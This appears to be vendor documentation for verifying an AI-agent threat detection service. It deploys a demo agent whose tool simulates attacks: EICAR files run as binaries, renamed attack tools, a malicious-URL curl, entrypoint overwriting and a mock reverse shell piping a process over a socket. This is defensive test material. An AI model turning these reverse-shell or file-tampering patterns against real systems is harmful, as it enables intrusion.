This page explains how to verify that Agent Engine Threat Detection is working by intentionally triggering detectors and checking for findings. Agent Engine Threat Detection is a built-in service of Security Command Center.
Before you begin
To detect potential threats to your Vertex AI Agent Engine agents, ensure that the Agent Engine Threat Detection service is enabled in Security Command Center.
Set up environment
To test Agent Engine Threat Detection, set up a demo agent that simulates malicious activity.
Create project and activate shell
Select or create a Google Cloud project to use for testing.
To test detectors, you can use the Google Cloud console and Cloud Shell.
Go to the Google Cloud console.
Select the project that you will use to test.
Click Activate Cloud Shell.
You can also run the testing instructions from a local shell.
Set up Vertex AI Agent Engine
If you haven't used Vertex AI Agent Engine in this project before, Set up the Vertex AI Agent Engine environment before starting. Record the name of the Cloud Storage staging bucket that you created. We also recommend that you follow the Vertex AI Agent Engine quickstart to learn how to develop and deploy an agent with the Vertex AI SDK.
Create test script
You will create several files that will be used to deploy a new agent for
testing. Use a text editor for this, such as nano.
Create a new file named
requirements.txtwith the following contents.google-cloud-aiplatform[agent_engines] google-adk google-genai aiohttp cloudpickle pydanticCreate a new empty file called
installation_scripts/install.sh. Some tests require adding content to this file.Create a new file called
main.py, with the following contents. Replace thePROJECT_ID,LOCATION, andSTAGING_BUCKETvariables. The staging bucket name must include thegs://prefix.import asyncio import os import subprocess import socket import vertexai from vertexai import Client, agent_engines from google.adk.agents import llm_agent from google.adk.sessions.in_memory_session_service import InMemorySessionService # Replace with your own project, location, and staging bucket. LOCATION = "LOCATION" PROJECT_ID = "PROJECT_ID" # Staging bucket must have gs:// prefix STAGING_BUCKET = "STAGING_BUCKET" client = Client(project=PROJECT_ID, location=LOCATION) def _run_command(args, **kwargs): output = f"Called {' '.join(args)}\n" try: res = subprocess.run(args, capture_output=True, text=True, **kwargs) if res.stdout: output += f"Result: {res.stdout.strip()}\n" if res.stderr: output += f"Error: {res.stderr.strip()}\n" except subprocess.TimeoutExpired: output += "Command timed out as expected." return output # Tool to simulate threats. The function body will be replaced for individual # detector tests. def threat_detection_test(): output = _run_command(["sleep", "60"]) output += _run_command(["echo", "this is a fake threat"]) output += _run_command(["sleep", "10"]) return output root_agent = llm_agent.Agent( model="gemini-2.5-flash", name="threat_detection_test_agent", description="Runs threat detection test.", instruction=""" You are an agent that runs a threat detection test using a fake malicious command. """, tools=[threat_detection_test], ) async def main(): vertexai.init( project=PROJECT_ID, location=LOCATION, staging_bucket=STAGING_BUCKET, ) app = agent_engines.AdkApp( agent=root_agent, session_service_builder=InMemorySessionService ) remote_agent = client.agent_engines.create( agent=app, config={ "display_name": "scc_threat_test_agent", "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY, "requirements": [ "google-cloud-aiplatform[agent_engines,adk]", "cloudpickle", "pydantic", ], "staging_bucket": STAGING_BUCKET, "extra_packages": [ "installation_scripts/install.sh", ], }, ) print("Deployed agent: ", remote_agent.api_resource.name) try: async for event in remote_agent.async_stream_query( user_id="threat_detection_tester", message="Run the threat detection test", ): print(event) finally: client.agent_engines.delete(name=remote_agent.api_resource.name, force=True) if __name__ == "__main__": asyncio.run(main())
Set up virtual environment
Create and activate a Python virtual environment.
python3 -m venv env source env/bin/activateInstall necessary dependencies in the virtual environment.
pip install -r requirements.txt
Test the script
Run the script from inside the virtual environment with python3 main.py.
This command will take several minutes to build, deploy, and execute the test agent.
The script outputs the resource name of the deployed agent, and a few JSON objects including an LLM response and other metadata. If you encounter permission errors or deployment errors at this stage, consult troubleshooting for next steps.
Test detectors
To test Agent Engine Threat Detection detectors, replace the code in the threat_detection_test
function with code that simulates an attack. The script can take a long time to
deploy and query the agent. To speed up testing, you can combine the contents of
several of these functions together.
Execution: Added Malicious Binary Executed
Replace the threat_detection_test function in the test script, and then run the
test script.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output += _run_command(["touch", "/tmp/test_mal_file"])
with open("/tmp/test_mal_file", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
output += _run_command(["sleep", "10"])
return output
Execution: Added Malicious Library Loaded
Replace the threat_detection_test function in the test script, and then run the
test script. You might receive an error from the Vertex AI SDK about
parsing the response, but the finding is still generated.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
with open("/tmp/test_mal_lib", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
output += _run_command(["sleep", "10"])
return output
Execution: Container Escape
Replace the threat_detection_test function in the test script, and then run the
test script.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
output += _run_command(["sleep", "10"])
return output
Execution: Kubernetes Attack Tool Execution
Replace the threat_detection_test function in the test script, and then run the
test script.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
output += _run_command(["/tmp/amicontained"])
output += _run_command(["sleep", "10"])
return output
Execution: Local Reconnaissance Tool Execution
Replace the threat_detection_test function in the test script, and then run the
test script.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
output += _run_command(["/tmp/linenum.sh"])
output += _run_command(["sleep", "10"])
return output
Execution: Modified Malicious Binary Executed
Replace the `threat_detection_test` function in the test script, and then run the
test script.
```python
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```
Execution: Modified Malicious Library Loaded
Replace the threat_detection_test function in the test script, and then run the
test script.
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
output += _run_command(["sleep", "10"])
return output
Malicious URL Observed
Update the installation_scripts/install.sh file with the following contents.
#!/bin/bash
apt-get install -y curl --no-install-recommends
Replace the threat_detection_test function in the test script, and then run the
test script.
def threat_detection_test():
url = "https://testsafebrowsing.appspot.com/s/malware.html"
output = _run_command(["sleep", "60"])
output += _run_command(["curl", url])
output += _run_command(["sleep", "10"])
return output
Reverse Shell
Replace the threat_detection_test function in the test script, and then run the
test script.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("8.8.8.8", 53))
subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
output += _run_command(["sleep", "10"])
return output
What's next
- Learn more about Agent Engine Threat Detection.
- Learn how to use Agent Engine Threat Detection.